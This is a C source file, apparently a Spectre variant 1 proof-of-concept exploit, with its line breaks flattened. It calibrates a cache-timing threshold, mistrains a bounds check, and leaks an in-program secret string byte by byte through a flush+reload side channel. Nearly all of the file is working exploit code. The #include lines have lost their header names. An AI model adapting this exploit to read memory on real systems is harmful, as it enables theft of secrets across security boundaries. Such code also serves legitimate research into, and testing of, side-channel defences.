#include #include #include #include #include #ifdef _MSC_VER #include /* for rdtscp and clflush */ #pragma optimize("gt",on) #else #include /* for rdtscp and clflush */ #endif #if defined(__i386__) || defined(__amd64__) #define CACHELINESIZE 64 static int _has_rdtscp; #else #error "unsupported architecture" #endif #if defined(__i386__) #define PUSH(r) "pushl %%e" #r "x\n" #define POP(r) "popl %%e" #r "x\n" #elif defined(__amd64__) #define PUSH(r) "pushq %%r" #r "x\n" #define POP(r) "popq %%r" #r "x\n" #endif char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; unsigned int array1_size = 16; uint8_t unused1[64]; uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; uint8_t unused2[64]; uint8_t array2[256 * 512]; uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ unsigned cache_hit_threshold; int verbose; static inline unsigned timedaccess(volatile uint8_t *addr) { uint64_t t0, t1; #pragma GCC diagnostic ignored "-Wuninitialized" unsigned int junk = junk; if (_has_rdtscp) { t0 = __rdtscp(& junk); junk |= *addr; t1 = __rdtscp(& junk); } else { t0 = __rdtsc(); junk |= *addr; t1 = __rdtsc(); } return (unsigned)(t1 - t0); } static void calibrate_clock(int verbose, unsigned int *threshold) { volatile char buf[2 * CACHELINESIZE]; volatile uint8_t *bufp; __attribute__((unused)) volatile int junk = 0; int i; const int cnt = 1000; uint64_t tcache, tmem; unsigned cap; __asm__ volatile ( PUSH(a) PUSH(b) PUSH(c) PUSH(d) "mov $0x80000001,%%eax\n" "mov $0,%%ecx\n" "cpuid\n" "mov %%edx,%0\n" POP(d) POP(c) POP(b) POP(a) : "=m" (cap) /* * clang sometimes stores the result using an offset relative to * %esp! That won't work, because we modify %esp with push and pop. * Hence, prevent them compiler from using %esp! */ :: "esp" ); #define HAVE_RDTSCP (1U << 27) if (cap & HAVE_RDTSCP) { if (verbose) printf("CPU has RDTSCP\n"); _has_rdtscp = 1; } else { if (verbose) printf("WARNING: CPU has no RDTSCP support, using RDTSC.\n"); _has_rdtscp = 0; } /* On i386 PIC we have to preserve %ebx, too */ __asm__ volatile ( PUSH(a) PUSH(b) PUSH(c) PUSH(d) "mov $0x7,%%eax\n" "mov $0,%%ecx\n" "cpuid\n" "mov %%ebx, %0\n" POP(d) POP(c) POP(b) POP(a) : "=m" (cap) :: "esp" ); bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINESIZE) & ~(CACHELINESIZE - 1))); junk |= *bufp; for (i = 0, tcache = 0; i < cnt; i++) tcache += timedaccess(bufp); tcache /= cnt; for (i = 0, tmem = 0; i < cnt; i++) { _mm_clflush((const void *)bufp); _mm_mfence(); tmem += timedaccess(bufp); } tmem /= cnt; if (threshold != NULL) { *threshold = tcache + (tmem - tcache) / 2; if (*threshold == (unsigned int)tmem) (*threshold)--; } if (verbose) { printf("Access time: memory %lu, cache %lu", tmem, tcache); if (threshold) printf(" -> threshold %d", *threshold); printf("\n"); } return; } void victim_function(size_t x) { if (x < array1_size) { temp &= array2[array1[x] * 512]; } } void leak( size_t malicious_x, uint8_t value[2], int score[2], unsigned cache_hit_threshold ) { static int results[256]; int tries, i, j, mix_i; unsigned int junk = 0; size_t training_x, x; register uint64_t time1, time2; volatile uint8_t *addr; for (i = 0; i < 256; i++) results[i] = 0; for (tries = 999; tries > 0; tries--) { /* Flush array2[256*(0..255)] from cache */ for (i = 0; i < 256; i++) _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */ /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ training_x = tries % array1_size; for (j = 29; j >= 0; j--) { _mm_clflush(&array1_size); for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */ //_mm_mfence(); NOT WORKING /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */ /* Avoid jumps in case those tip off the branch predictor */ x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */ x = training_x ^ (x & (malicious_x ^ training_x)); /* Call the victim! */ victim_function(x); } /* Time reads. Order is lightly mixed up to prevent stride prediction */ for (i = 0; i < 256; i++) { mix_i = ((i * 167) + 13) & 255; addr = & array2[mix_i * 512]; time1 = __rdtscp(& junk); /* READ TIMER */ junk = *addr; /* MEMORY ACCESS TO TIME */ time2 = __rdtscp(& junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */ if (time2 <= cache_hit_threshold && mix_i != array1[tries % array1_size]) results[mix_i]++; /* cache hit - add +1 to score for this value */ } /* Locate highest & second-highest results tallies in j */ j = -1; for (i = 0; i < 256; i++) { if (j < 0 || results[i] >= results[j]) { j = i; } } if (results[j] == 3) break; } results[0] ^= junk; /* use junk so code above won’t get optimized out*/ value[0] = (uint8_t) j; score[0] = results[j]; //value[1] = (uint8_t) k; //score[1] = results[k]; } int main(int argc, char ** argv) { int o; size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */ int i, score[2], len = (int)strlen(secret); uint8_t value[2]; unsigned sucesses = 0; while ((o = getopt(argc, argv, "t:v")) != EOF) { switch (o) { case 't': cache_hit_threshold = atoi(optarg); break; case 'v': verbose++; break; default: usage: fprintf(stderr, "usage: %s [-v] " "[-t threshold]\n", argv[0]); return 2; } } if (argc != optind) goto usage; calibrate_clock(verbose, cache_hit_threshold ? NULL : &cache_hit_threshold); for (i = 0; i < (int)sizeof(array2); i++) array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */ if(verbose) { printf("Threshold is: %d\n", cache_hit_threshold); printf("Leaking %d bytes:\n", (int)strlen(secret)); } while (--len >= 0) { leak(malicious_x++, value, score, cache_hit_threshold); if(score[0] == 3 && value[0] > 31 && value[0] < 127) { sucesses++; fprintf(stderr, "\033[32m%c\033[0m", (value[0])); } else { fprintf(stderr, "\033[31m?\033[0m"); } } fprintf(stderr, "\n"); printf("%.0f%%\n", 100 * sucesses / (float)strlen(secret)); _mm_mfence(); return 0; }